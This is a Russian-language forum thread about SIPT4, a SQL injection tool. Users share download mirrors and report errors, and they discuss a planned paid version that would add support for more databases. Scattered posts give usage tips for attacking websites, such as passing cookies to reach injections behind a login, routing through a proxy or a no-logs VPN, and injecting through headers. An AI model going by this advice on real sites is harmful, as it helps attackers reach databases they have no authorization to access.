может быстрее дело пойдет :(

врядли

а в чем проблема то ?
ну вот пятая на QT пишется

Да вот ни в чём, просто язык этот ужасный, но глядя на прогу, сразу видно что автор - мастер.

ну вот пятая на QT пишется
Версия будет паблик?
Как я понимаю с++ и QT выбран для кроссплатформенности

']Версия будет паблик?
Как я понимаю с++ и QT выбран для кроссплатформенности
ясен хер что паблик, иначе смысл какой? во вторых этим занимается не один человек, ну и в третьих- ога кросплаформенность, а то под никсами то нечем :D

Версия будет паблик?
Паблик, но есть возможность что будет несколько версий в том числе и платная)
Кроссплатформенная, но вообще и 3 и 4ая версия прекрасно себя чувствовали под Wine.

О, если будет пятая на QT, можно не мучаться с эмуляторами...

замечательная новость.

а у меня линк не работался

перезалейте :( plz

Прога работает отлично !! Вот только хотелось под linux....
Ссылка рабочая есть выше!
Но по мне лучше всё руками перебирать, так как-то приятнее получается =)

так 5ая версия вышла или готовится еще?

Прога работает отлично !! Вот только хотелось под linux....
Ссылка рабочая есть выше!
Но по мне лучше всё руками перебирать, так как-то приятнее получается =)

Под Wine идет

так 5ая версия вышла или готовится еще?

Готовится

что делать если при нажатии на кнопку Check GET --> Post параметры Injectoin type \ Request type меняються на Post / PostData ?
Мне не они нужны ...

ыыыыыыаАаааа, вот отжег)
А собственно зачем ты нажимаешь эту кнопку если она тебе не нужна.

если у ково есть перезалейте в рапид// please

http://rapidshare.com/files/319385590/sipt4.rar.html

ыыыыыыаАаааа, вот отжег)
А собственно зачем ты нажимаешь эту кнопку если она тебе не нужна.
а как сканирование запустить то?))

если новая 5ая версия готовится тогда думаю не только мускул будеть

Немогу запустить тулзу через Фрикап на вин7, кто что посоветует?

впн без логов

Под Win7 SIPT4 работает?

Под Win7 SIPT4 работает?
да. нормально работает.

Немогу запустить тулзу через Фрикап на вин7, кто что посоветует?
proxifier

вес еще нету пятой ветки! Хорошо бы если под новый год выйдет

думаю в январе если все пойдет нормально, но возможно она будет платной, из-за того что привлечен сторонний програмист.

думаю в январе если все пойдет нормально, но возможно она будет платной, из-за того что привлечен сторонний програмист.
блин я за что будеть платной но главное поддержал не тока мускул

У меня одного сайт с софтом не работает?

Распиши что ты делаеш и мы тебе поможем... я убедился что тут не форум екстрасенсов

Уважаемые, перезалейте пожалуйста sipt 4

Уважаемые, перезалейте пожалуйста sipt 4
пожалуйста
http://www.multiupload.com/EHULCGS1WA

как скачать то отсюда? ttp://dbattack.com/files/setup.sipt4.rar

как скачать то отсюда? ttp://dbattack.com/files/setup.sipt4.rar
какая разница откуда скачать, я перезалил то что я сам юзаю

какая разница откуда скачать, я перезалил то что я сам юзаю

хм, а ты откуда взял?

эта прога у меня давно и хз откуда скачал

Кто знает как с её помощью авторизоваться на сайте? Если уязвимость доступна только после логина?

Кто знает как с её помощью авторизоваться на сайте? Если уязвимость доступна только после логина?
тебе надо настроит все headers+куки

Кто знает как с её помощью авторизоваться на сайте? Если уязвимость доступна только после логина?

Если авторизация через куки(Basic или cессия) просто логинишься например через FireFox с плагинов LiveHEader или DataTamper, или просто смотришь выданые тебе куки сайтом, в настройках кук, после авторизации и эти заголовки добавляешь в Header поле программы.

какая разница откуда скачать, я перезалил то что я сам юзаю

антивирь ругается, говорит что remote admin детектед.

http://www.sendspace.com/file/63jupj
CRC32: 779D3353
MD5: AD56317BCAC799F0B32CA2C92100A7DC
SHA-1: 81FCBD582B1248596562415240CFC6E36AE67831

error
Run-time error '35756'
unable to connect request
у кого такое было ?
прогу переставлял

http://www.sendspace.com/file/63jupj
CRC32: 779D3353
MD5: AD56317BCAC799F0B32CA2C92100A7DC
SHA-1: 81FCBD582B1248596562415240CFC6E36AE67831
а че ман не выложишь в архив? был вроде раньше на сайте хороший ман.

антивирь ругается, говорит что remote admin детектед.
прям ппц какой то если и в правду ремот админом прикреплен. Я его уже год узал на своей машине.
Ты каким антивирем проверил незнаю но у меня нод32 с последными обновами молчит :eek:

http://www.virustotal.com/ru/analisis/789cba635eb2865ff42ef7bf7d288dcc4e7b4b7692bd1776b3 e07637bb95f8c9-1253581177
вот так выглядит нормальная версия, которую я выложил

УБИРАЕМ ПРОБЕЛЫ ИЗ УРЛ

антивирь ругается, говорит что remote admin детектед.
когда постишь указывай какой антвирь, версия итп. может у тебя смописный -хз :D

и откуда ты скачал фал? ;)

нифига ложный вызов, может у тя и вправду самописный антивир )))
Вот мои результаты:
http://www.virustotal.com/ru/analisis/789cba635eb2865ff42ef7bf7d288dcc4e7b4b7692bd1776b3 e07637bb95f8c9-1264045421

седня обратил внимание что на проге ф функциях BruteForce Attacking отключены из 4х 3:
More1Row
Sleep-Based
Benchmark
тока Standart включен

Если когда писалось прога такие функции не были изучены до конца тогда зачем добавлен, если были то зачем отключен или у меня крывая версия?

седня обратил внимание что на проге ф функциях BruteForce Attacking отключены из 4х 3:
More1Row
Sleep-Based
Benchmark
тока Standart включен

Если когда писалось прога такие функции не были изучены до конца тогда зачем добавлен, если были то зачем отключен или у меня крывая версия?

Намеревалось сделать , но не было сделано.
Сейчас уже реальизовано в новой версии, но она пока не вышла.

бло бро ты уже скажал что выйдет в январе но все еще нету, там если можно добавьте все бд + проверка на нестандартные скули тоже чтоб ручками параметры настроили и запускали

ну так первый билд уже тестируется в закрытых группах , будет и на вашей улице праздник!)

Версия будет паблик?
Паблик, но есть возможность что будет несколько версий в том числе и платная)
Кроссплатформенная, но вообще и 3 и 4ая версия прекрасно себя чувствовали под Wine.
из этого думал что прогу не тока на приват разделах постите, а что тут тоже можем тестировать
обидно тока

ладно поживем увидем, но некоторые рекомендации все таки отправил в личку

вы что то забыли про новую версию или больше не будем видет в паблике? Если нет то надо обьявит что будеть тока в привате

Как там пятая версия поживает? :)

Поживает, в паблике будет 4.x ветка

Поживает, в паблике будет 4.x ветка
нет в паблике уже есть 4х ветка, но что уже в привате решили не продавать даже для смертных??? Сами сказали что может быть платая версия, вот и постите цену и тд

нет в паблике уже есть 4х ветка, но что уже в привате решили не продавать даже для смертных??? Сами сказали что может быть платая версия, вот и постите цену и тд
таким образом она уйдет в паблик

ну вед что плохого если продать прогу вед оплачивает финансы программиста и тд. И еще что плохого если прога уйдеть в паблик, вед если чел купил прогу так он не будеть выкладивать в паблик и если так не пойдет тогда сделайте персоналные билды и продайте. Все равно не надо просто так гнит в приват разделах такую прогу.

ну вед что плохого если продать прогу вед оплачивает финансы программиста и тд. И еще что плохого если прога уйдеть в паблик, вед если чел купил прогу так он не будеть выкладивать в паблик и если так не пойдет тогда сделайте персоналные билды и продайте. Все равно не надо просто так гнит в приват разделах такую прогу.

Слушай, я тебе поясняю, прога переписывается, на данный момент есть супер плохой билд версии 4.5 , который лежит в привате , он отлаживается, как только он отладится - он будет в паблике, и будет поддерживать только MySQL и версия будет 4.x.x

Платная версия 5.x.x будет поддерживать также MSSQL, ACCESS, POSTGRE, ORACLE, DB2(возможно) , SYBASE(возможно) и БУДЕТ ПЛАТНОЙ!.

да понял я, уж думал пятая версия вообще не будеть выйти в паблик. Пусть платный но надо юзать такое чудище ))

так давайте уже 5ую ветку продать то

как скачать? залейте куда нить

как скачать? залейте куда нить
http://www.sendspace.com/file/63jupj
CRC32: 779D3353
MD5: AD56317BCAC799F0B32CA2C92100A7DC
SHA-1: 81FCBD582B1248596562415240CFC6E36AE67831
это вроде автор залил
там 4версия, но чет автор забыл или передумал продать наверное ))

думаю sqlhack уже бросил разработку новый версий SIPT5 (хотя я уже истратил средства для покупки новой версии) но сказали будеть готово в январе. Пока что toolza от Pashkela рулит ))

Вопрос по SIPT4.
Есть иньекция в урле, но результат выводится в заголвках(headers). Как-нибудь можно заставить SIPT и их цеплять?

Вопрос по SIPT4.
Есть иньекция в урле, но результат выводится в заголвках(headers). Как-нибудь можно заставить SIPT и их цеплять?
да можно для этого надо выбрать в настройке:Injection type параметр:Header
и во вкладке Additiontal Header написать уязвимый параметр и добавить {SQLINJ}

YuNi|[c
Ты неправильно понял меня: уязвим параметр, передающийся в урле, а само уязвимое поле выводится в заголовках.

YuNi|[c
Ты неправильно понял меня: уязвим параметр, передающийся в урле, а само уязвимое поле выводится в заголовках.
я тебя понял, просто Request type надо оставит GET

я тебя понял, просто Request type надо оставит GET

Отвечаю на последний вопрос, сипт не умеет цеплять ответы в хидерах.

А так же замечу что работа ведется, просто медленнее чем планировалось. Прогер занят на другом проекте.

Ошибка №1

http://i.piccy.info/i4/6d/47/08751977358c0b1bcade231218cd.jpeg

Насколько я понимаю, вызывается при событии OnChange почти любого текстового поля, выпадающего списка, а также некоторых кнопок. Почему оно не может сохранить файл конфигурации?! :confused:

Ошибка №2

http://i.piccy.info/i4/07/fb/01adc048241e3b200401f7ef01ec.jpeg

Вызывается при загрузке структуры дерева "Edit By Hand - Load All Struct - Submit changes"
Структуру указываю правильную, тобишь предварительно сохраненную при помощи "Save for programm"

Ошибка №1

http://i.piccy.info/i4/6d/47/08751977358c0b1bcade231218cd.jpeg

Насколько я понимаю, вызывается при событии OnChange почти любого текстового поля, выпадающего списка, а также некоторых кнопок. Почему оно не может сохранить файл конфигурации?! :confused:

Ошибка №2

http://i.piccy.info/i4/07/fb/01adc048241e3b200401f7ef01ec.jpeg

Вызывается при загрузке структуры дерева "Edit By Hand - Load All Struct - Submit changes"
Структуру указываю правильную, тобишь предварительно сохраненную при помощи "Save for programm"
ну это ошибка уже давно известно, придется просто не юзать ту функцию или в новых версиях может такого не будеть

Проблему с сохранением файла конфигураций решила переустановка SIPT'а.

А у меня такая проблема
http://i.piccy.info/i5/10/89/108910/1111.jpg
когда начинаю подбирать таблицы на mysql 4 то вылитает это...

Как сделать штобы это работало....

Указать правильный путь к файлу tables.txt )

shell_c0de
А где его указывать надо то?

shell_c0de
А где его указывать надо то?
na proge. Tam je vse est'.

чет вышел уже хавий 1.09 версия с поддержкой вывода через ошибок но наш сипт5 задерживается

Что то по линку, который в первом посте, не скачивается.

Что то по линку, который в первом посте, не скачивается.
http://www.sendspace.com/file/63jupj

Что то при установке эта прога выбивает ошибку!!!

Можно ли исходники получить..? Хочется под себя "настроить":)